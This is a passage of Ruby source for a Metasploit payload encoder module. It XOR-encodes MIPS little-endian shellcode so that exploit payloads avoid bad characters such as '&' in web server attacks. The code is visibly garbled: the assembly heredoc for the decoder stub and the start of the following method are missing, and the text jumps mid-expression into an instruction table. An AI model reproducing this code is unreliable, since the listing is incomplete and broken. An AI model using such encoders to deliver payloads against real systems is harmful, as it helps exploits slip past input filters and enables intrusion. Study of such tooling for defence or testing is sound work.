## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'metasm' class Metasploit3 < Msf::Encoder::Xor Rank = NormalRanking def initialize super( 'Name' => 'Byte XORi Encoder', 'Description' => %q{ Mips Web server exploit friendly xor encoder. This encoder has been found useful on situations where '&' (0x26) is a badchar. Since 0x26 is the xor's opcode on MIPS architectures, this one is based on the xori instruction. }, 'Author' => [ 'Julien Tinnes ', # original longxor encoder, which this one is based on 'juan vazquez' # byte_xori encoder ], 'Arch' => ARCH_MIPSLE, 'License' => MSF_LICENSE, 'Decoder' => { 'KeySize' => 1, 'BlockSize' => 1, 'KeyPack' => 'C', }) end # # Returns the decoder stub that is adjusted for the size of the buffer # being encoded. # def decoder_stub(state) # add 4 number of passes for the space reserved for the key, at the end of the decoder stub # (see commented source) number_of_passes=state.buf.length+4 raise InvalidPayloadSizeException.new("The payload being encoded is too long (#{state.buf.length} bytes)") if number_of_passes > 32766 # 16-bits not (again, see also commented source) reg_14 = (number_of_passes+1)^0xFFFF decoder = Metasm::Shellcode.assemble(Metasm::MIPS.new(:little), < "\x2b\xf0\xee\x02", # set less than unsigned "slt $30, $23, $14" => "\x2a\xf0\xee\x02" # set less than } instructions.each do |k,v| if Rex::Text.badchar_index(v, state.badchars) == nil return k end end raise BadcharError.new, "The #{self.name} encoder failed to encode the decoder stub without bad characters.", caller end def encode_finalize_stub(state, stub) # Including the key into the stub by ourselves because it should be located # in the last 4 bytes of the decoder stub. In this way decoding will convert # these bytes into a nop instruction (0x00000000). The Msf::Encoder only supports # one decoder_key_offset position real_key = state.key stub[-4, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack) stub[-3, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack) stub[-2, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack) stub[-1, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack) return stub end end